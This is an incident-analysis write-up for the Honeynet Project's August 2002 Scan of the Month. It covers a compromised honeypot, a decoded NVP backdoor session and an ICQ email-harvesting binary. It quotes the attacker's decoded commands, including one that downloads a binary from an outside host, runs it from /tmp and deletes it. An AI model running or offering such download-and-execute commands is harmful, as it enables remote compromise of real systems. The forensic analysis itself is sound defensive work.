Scan of the Month 22 - Analysis by Christophe GRENIER

Introduction

This document is an analysis performed for the Honeynet Projects Scan of the Month for August 2002. After penetrating the Linux system using the WU-FTPD vulnerability, the attacker deployed a backdoor binary and then proceeded to use the system for certain nefarious activity. I took part in the reverse challenge to understand how this binary works. The goal is to determine what the activity was and how it was accomplished. All the necessary evidence is contained in the snort binary capture file. The IP address of the honey pot is 172.16.183.2.

Tools

http://www.ethereal.com
TCPFlow
Fenris
p0f
grep, sort, objdump...

Analysis

Verify the log signatures

First, download the log file and verify the MD5 checksum:

[kmaster@christophe kmaster]$ md5sum snort-0718%401401.log.gz
6d0056c385f4d312f731d9506e217314  snort-0718%401401.log.gz

Using ethereal, we can see that the first frame arrival time is April 12, 2002 13:45:02. (Don't know if it's universal time or not).

Packet checksum

Using ethereal, we can see packet with IP 10.10.10.10 and 11.11.11.11 have wrong checksum (IP header, TCP header...). The IP address may have been altered to protect the privacy of the networks.

MAC address observation

MACIP
00:50:56:01:00:00"Internet Gateway"
00:50:56:c7:f7:62172.16.183.8
00:50:56:dc:13:a2172.16.183.2

MAC address beginning by 00:50:56 corresponds to VMWare (see /etc/ethereal/manuf). The Honetnet is running in a virtual machine as explained here.

Small extract:

On February 18, 2002 the Honeynet maintained by team member Michael Clark was attacked. This Honeynet was a virtual Honeynet using VMware and running several instances of Red Hat Linux. A Red Hat Linux 6.2 box (yes, people are still actually hacking these systems) was compromised with the wu-ftpd exploit. Once hacked into, the attacker downloaded the Reverse Challenge binary onto the system and executed it. The binary was downloaded from another hacked system, acting as a distribution center for the attacker. This implies the attacker was breaking into other systems, and downloading the binary from the same central system.

Frame arrival time may have been altered: February 18, 2002 and April 12, 2002 mismatches.

TCP stream reassembly

Using tcpflow -r snort.log, you can reassemble all TCP stream.

Protocol hierarchy

With ethereal, using Follow TCP stream, you can read the connection is done following HTTP protocol to 216.242.103.2 (ns1.synergycorp.com). Using "Decode As", decode TCP destination 8882 as HTTP. Use this feature to replace the incorrect MAPI and Socket protocol by HTTP.

ICMP

By filtering the ICMP protocol with tethereal -Vnr snort.log icmp|egrep "(Code:|Src)", we can see some ping from the HonetPot 172.16.183.2 to the fake address 10.10.10.10. The ICMP Port unreachable messages are more interesting:

...
Internet Protocol, Src Addr: 172.16.183.8 (172.16.183.8), Dst Addr: 169.254.129.1 (169.254.129.1)
    Code: 3 (Port unreachable)
    Internet Protocol, Src Addr: 169.254.129.1 (169.254.129.1), Dst Addr: 216.158.2.205 (216.158.2.205)
    User Datagram Protocol, Src Port: 137 (137), Dst Port: 137 (137)
Internet Protocol, Src Addr: 172.16.183.8 (172.16.183.8), Dst Addr: 216.228.169.97 (216.228.169.97)
    Code: 3 (Port unreachable)
    Internet Protocol, Src Addr: 216.228.169.97 (216.228.169.97), Dst Addr: 216.158.2.205 (216.158.2.205)
    User Datagram Protocol, Src Port: 137 (137), Dst Port: 137 (137)
Internet Protocol, Src Addr: 172.16.183.2 (172.16.183.2), Dst Addr: 207.245.82.2 (207.245.82.2)
    Code: 3 (Port unreachable)
    Internet Protocol, Src Addr: 207.245.82.2 (207.245.82.2), Dst Addr: 216.158.2.203 (216.158.2.203)
    User Datagram Protocol, Src Port: 53 (53), Dst Port: 1025 (1025)

Port 137 (netbios-ns) is closed on 172.16.183.8
Port 53 (domain) is closed on 172.16.183.2, it has been probed by 207.245.82.2 (ns2.dca.net)
The public address of 172.16.183.2 is 216.158.2.203, the public IP of 172.16.183.8 is 216.158.2.205.

whois 216.158.2.202@whois.arin.net
[whois.arin.net]
Consult Dynamics, Inc. (NETBLK-DCAN-001)
   1204 West Street
   Wilmington, DE 19801
   US

   Netname: DCAN-001
   Netblock: 216.158.0.0 - 216.158.63.255
   Maintainer: DCAN

   Coordinator:
      White, Andrew J.  (AW99-ARIN)  abuse@DCA.NET
      +1-302-654-1019 (FAX) +1-302-426-1568

   Domain System inverse mapping provided by:

   NS1.DCA.NET                  204.183.80.2
   NS2.DCA.NET                  207.245.82.2

   ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

   Record last updated on 07-May-2001.
   Database last updated on  13-Aug-2002 20:01:19 EDT.

The two IP are in the Consult Dynamics/DCANet range.

Decrypting the-binary command (Fake NVP)

the-binary is the name of the trojan analysed during the Reverse challenge. It has been installed on the honeynet as /usr/bin/mingetty. See Hacker command. The IP Protocol 11 (NVP) Backdoor Tool is a utility that receives commands through a protocol designed to masquerade as NVP (Network Voice Protocol) traffic. It is designed to give a remote attacker the ability to control a machine through non-standard communication channels, and is able to take advantage of permissive firewalls that allow IP Protocol 11 packets to pass through unfiltered. All communications are encoded with a custom-encoding algorithm. In the event that a communication packet contains commands for direct execution by the infected host, this encoding system prevents an eavesdropper from easily obtaining the commands in plaintext as they travel across intermediary networks. Additionally, the communications protocol is entirely stateless, thereby allowing an attacker to mask his identity by spoofing the source address of his communication.

Full description is avaible here. You can find a decoder on Honetnet decoder.c but I have used mine spy_pcap.c

7 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 94.0.146.98 -> 172.16.183.2
the-binary client->server
set hacker address 203.173.144.50
use fake address 1

We learn an address used by the hacker: 203.173.144.50 (p50-tnt7.syd.ihug.com.au). Its backdoor will answer to this address and fake ones.

8 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 192.146.201.172 -> 172.16.183.2
the-binary client->server
cmd=grep -i "zone" /etc/named.conf
9 =====> Packet intercepted, 546 bytes sniffed <=====
00:50:56:dc:13:a2 -> 00:50:56:01:00:00 IP 172.16.183.2 -> 175.44.57.180
the-binary client<-server
cmd=3 41 zone "." {
  zone "0.0.127.in-addr.arpa" {
...

The hacker searches what zones are configured in the DNS. the-binary file can be used to forge DNS request. It will be more interesting to check if it is configured as a DNS forwarder... Maybe he tries to learn which company he has hacked. At packet 3889, the server 207.245.82.2 (ns2.dca.net) has done a query for web.icq.com (port 53). As seen, this port is closed on the honeypot.

62 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 168.148.27.14 -> 172.16.183.2
the-binary client->server
blind cmd=killall -9 ttserve
63 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 10.39.81.89 -> 172.16.183.2
the-binary client->server
blind cmd=killall -9 ttserve

72 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 58.248.76.90 -> 172.16.183.2
the-binary client->server
blind cmd=killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp
/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./
ttserve ;

At 19:57:37, the hacker sends a command to download the foo binary and run it.

1236 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 218.209.145.27 -> 172.16.183.2
the-binary client->server
blind cmd=killall -9 lynx ; rm -rf /tmp/ttserve;
1237 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 122.255.17.55 -> 172.16.183.2
the-binary client->server
blind cmd=killall -9 lynx ; rm -rf /tmp/ttserve;

1282 =====> Packet intercepted, 436 bytes sniffed <=====
00:50:56:01:00:00 -> 00:50:56:dc:13:a2 IP 26.44.146.84 -> 172.16.183.2
the-binary client->server
blind cmd=killall -9 lynx ; rm -rf /tmp/ttserve;

Five minutes later (20:02:40), the hacker sends command to stop the lynx transfer and remove the downloaded file.

All packets have a TTL of 237, 10.39.81.89 is a private IP, 58.248.76.90 is a reserved IP: packets are spoofed.

FTP

There is a WUFTP 2.6.0(1) server on the honeypot, nothing new. We already know the hacker have penetrating the Linux system using the WU-FTPD vulnerability.

220 serv1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
USER anonymous
331 Guest login ok, send your complete e-mail address as password.
PASS Pgpuser@home.com
530 Login incorrect.
221 You could at least say goodbye.

HTTP

Packet 73 is the beginning of a HTTP connection from the Honetpot to 11.11.11.11:8882 to retrieve the foo binary.

GET /foo HTTP/1.0
Host: 216.242.103.2:8882
Accept: text/html, text/plain, audio/mod, image/*, video/*, video/mpeg, application/pgp, application/pgp, application/pdf, message/partial, message/external-body, application/postscript, x-be2, application/andrew-inset, text/richtext, text/enriched
Accept: x-sun-attachment, audio-file, postscript-file, default, mail-file, sun-deskset-message, application/x-metamail-patch, text/sgml, */*;q=0.01
Accept-Encoding: gzip, compress
Accept-Language: en
User-Agent: Lynx/2.8.3dev.18 libwww-FM/2.14

HTTP/1.1 200 OK
Server: Foobarcatdog1
Content-type: text/x-csrc
Content-length: 215464
Accept-Ranges: bytes
...

We learn the real address of 11.11.11.11 is 216.242.103.2. Using rewrite_log, a program coded for this purpose, the log file is rewritten with this IP. The checksum are now corrects. editcap from ethereal don't seems to be able to do such modification... (Honeynet team will say how they have altered the file and with which tool). This binary has been saved for further analysis. Check file 216.242.103.002.08882-172.016.183.002.01025 generated by tcpflow after this modification.

GET /wwp?Uin=9207100 HTTP/1.0
Host: web.icq.com

HTTP/1.1 200 OK
Date: Fri, 12 Apr 2002 19:58:41 GMT
Server: Apache/1.3.12 (Unix) mod_ssl/2.6.6 OpenSSL/0.9.5a
Cache-Control: max-age=0
Expires: Fri, 12 Apr 2002 19:58:41 GMT
Connection: close
Content-Type: text/html
...
GET /wwp?Uin=9207199 HTTP/1.0
Host: web.icq.com

HTTP/1.1 200 OK
Date: Sat, 13 Apr 2002 00:23:51 GMT
Server: Apache/1.3.12 (Unix) mod_ssl/2.6.6 OpenSSL/0.9.5a
Cache-Control: max-age=0
Expires: Sat, 13 Apr 2002 00:23:51 GMT
Connection: close
Content-Type: text/html
...

There are repeated HTTP connections to http://web.icq.com/wwp?Uin=x where x is an Universal Internet Number (UIN) incrementing from 9207100 up to 9207199. The fetched page

Outgoing connection are really slow, there are packet retransmissions. A technique used by the Honeynet team is to configure the firewall to limit outgoing new connection to avoid DOS attack (see Virtual Honeynets).

DNS

The Honeypot DNS is 207.245.82.2 (ns2.dca.net). At packet 3889, the server 207.245.82.2 (ns2.dca.net) has done a query for web.icq.com (port 53) on the Honeyport. But as seen, this port is closed.

UDP Port 53413

Alter the downloading of foo binary, server 216.242.103.2 (ns1.synergycorp.com) is contacted on port 53413 with data GU (hex:47 55 0a). The reply has been DU9207100 (hex: 44 55 39 32 30 37 31 30 30 0a). It's the first ICQ Uin checked.

Foo Binary analysis

The read-only section of foo binary contains some interesting data:

objdump -s -j .rodata foo
 
foo:     file format elf32-i386

Contents of section .rodata:
8074a48 286e6673 696f6429 002f0032 31362e32  (nfsiod)./.216.2
8074a58 34322e31 30332e32 00474f54 0047550a  42.103.2.GOT.GU.
8074a68 00444945 00445500 256c7500 5345256c  .DIE.DU.%lu.SE%l
8074a78 750a0077 65622e69 63712e63 6f6d0047  u..web.icq.com.G
8074a88 4554202f 7777703f 55696e3d 256c7520  ET /wwp?Uin=%lu
8074a98 48545450 2f312e30 0d0a486f 73743a20  HTTP/1.0..Host:
8074aa8 7765622e 6963712e 636f6d0d 0a0d0a00  web.icq.com.....
8074ab8 67657468 6f737462 792a2e67 6574616e  gethostby*.getan
8074ac8 73776572 3a206173 6b656420 666f7220  swer: asked for
...

Foo binary have been downloaded from http://216.242.103.2:8882/foo. When started, it has contacted 216.242.103.2 (ns1.synergycorp.com) to get the UIN (GU=Get UIN ?) and have made repeated HTTP connection to web.icq.com. Before each connection, a DNS name query on web.icq.com is done, it generates unnecessary traffic. DNS resolution is needed only one time. A good programmer may have used parallel connection to speed up the process.

To know what treatment is done on HTML web page, a quick reverse analysis of foo have been done. Using dress from fenris, I have add symbols to easily find function name ./dress -F support/fn-libc5.dat ~/scan/foo ~/scan/foo_dress . In objdump -d foo_dress output, search a call to recv function.

8048753:       50                      push   %eax
8048754:       e8 eb b7 01 00          call   8063f44 <recvfrom / sendto+0x60>
8048759:       83 c4 10                add    $0x10,%esp
804875c:       6a 00                   push   $0x0

Near this code, I have found a check for the HTML word mailto:.

 804885a:       8d 36                   lea    (%esi),%esi
 804885c:       80 bd df fb ff ff 6d    cmpb   $0x6d,0xfffffbdf(%ebp)	'm'
 8048863:       74 07                   je     0x804886c
 8048865:       c7 45 e0 00 00 00 00    movl   $0x0,0xffffffe0(%ebp)
 804886c:       eb 7a                   jmp    0x80488e8
 804886e:       8d 36                   lea    (%esi),%esi
 8048870:       80 bd df fb ff ff 61    cmpb   $0x61,0xfffffbdf(%ebp)	'a'
 8048877:       74 07                   je     0x8048880
 8048879:       c7 45 e0 00 00 00 00    movl   $0x0,0xffffffe0(%ebp)
 8048880:       eb 66                   jmp    0x80488e8
 8048882:       8d 36                   lea    (%esi),%esi
 8048884:       80 bd df fb ff ff 69    cmpb   $0x69,0xfffffbdf(%ebp)	'i'
 804888b:       74 07                   je     0x8048894
 804888d:       c7 45 e0 00 00 00 00    movl   $0x0,0xffffffe0(%ebp)
 8048894:       eb 52                   jmp    0x80488e8
 8048896:       8d 36                   lea    (%esi),%esi
 8048898:       80 bd df fb ff ff 6c    cmpb   $0x6c,0xfffffbdf(%ebp)	'l'
 804889f:       74 07                   je     0x80488a8
 80488a1:       c7 45 e0 00 00 00 00    movl   $0x0,0xffffffe0(%ebp)
 80488a8:       eb 3e                   jmp    0x80488e8
 80488aa:       8d 36                   lea    (%esi),%esi
 80488ac:       80 bd df fb ff ff 74    cmpb   $0x74,0xfffffbdf(%ebp)	't'
 80488b3:       74 07                   je     0x80488bc
 80488b5:       c7 45 e0 00 00 00 00    movl   $0x0,0xffffffe0(%ebp)
 80488bc:       eb 2a                   jmp    0x80488e8
 80488be:       8d 36                   lea    (%esi),%esi
 80488c0:       80 bd df fb ff ff 6f    cmpb   $0x6f,0xfffffbdf(%ebp)	'o'
 80488c7:       74 07                   je     0x80488d0
 80488c9:       c7 45 e0 00 00 00 00    movl   $0x0,0xffffffe0(%ebp)
 80488d0:       eb 16                   jmp    0x80488e8
 80488d2:       8d 36                   lea    (%esi),%esi
 80488d4:       80 bd df fb ff ff 3a    cmpb   $0x3a,0xfffffbdf(%ebp)	':'
 80488db:       75 07                   jne    0x80488e4

The foo program collects email addresses.

Passive OS fingerprinting

Using p0f, we can try to determine OS.

p0f -s snort2.log |sort -u
p0f: passive os fingerprinting utility, version 1.8.2
(C) Michal Zalewski <lcamtuf@gis.net>, William Stearns <wstearns@pobox.com>
p0f: file: '/etc/p0f.fp', 150 fprints, iface: 'eth0', rule: 'all'.
172.16.183.2 [1 hops]: Linux 2.2.9 - 2.2.18
61.114.247.229 [20 hops]: Linux 2.2.9 - 2.2.18
62.57.114.246: UNKNOWN [60352:47:1460:1:2:0:1:52].
80.11.16.253 [24 hops]: Windows 2000 (9)
80.14.184.201: UNKNOWN [16384:105:1460:1:-1:0:1:48].

Questions

1.What is the attacker's IP address?

The hacker uses 203.173.144.50 (p50-tnt7.syd.ihug.com.au) to get command output from the-binary but he also uses 216.242.103.2 (ns1.synergycorp.com) to download file to hacked computer and controls its ICQ gathering program.

2.What is the attacker doing first? What do you think is his/her motivation for doing this?

After grepping the zone of the DNS configuration file, he has downloaded and run the foo binary. The hacker searches what zones are configured in the DNS. the-binary file can be used to forge DNS request. It will be more interesting to check if it is configured as a DNS forwarder... Maybe he tries to learn which company he has hacked.

3.Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?

To avoid detection, the-binary don't used fixed size packet. The size is randomly increased. When the packet is sent, data stored in the contiguous buffer are also sent. This contiguous buffer is not overwritten and its data are not encoded. This problem has already been discovered by some Reverse challengers i.e. (CoPS) Lab at the University of North Texas.

4.What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?

Foo binary have been downloaded from http://216.242.103.2:8882/foo. When started, it has contacted 216.242.103.2 (ns1.synergycorp.com) to get the UIN (GU=Get UIN ?) and have made repeated HTTP connection to fetch the following web page http://web.icq.com/wwp?Uin=x with an incrementing UIN to collect email address.

Before each connection, a DNS name query on web.icq.com is done, it generates unnecessary traffic. A good programmer may have used only one DNS resolution and used parallel connection to speed up the process: the hacker is an amateur.

5.What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?

The hacker runs the binary and after execution, removes it. Once running, the file can be deleted, the hacker don't need to wait to remove it.

6.How do you think the attacker will use the results of his activity involving 'foo'?

Email spamming, it can be UCE or maybe the hacker will send trojan/virii...

7.If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it

As Network Administrator, such NVP backdoor will have been logged by firewalls. My Snort configuration won't detect it. Upgrading my snort rules will be a good idea.


Christophe GRENIER
Security Consultant
Global Secure
mail me personally or at work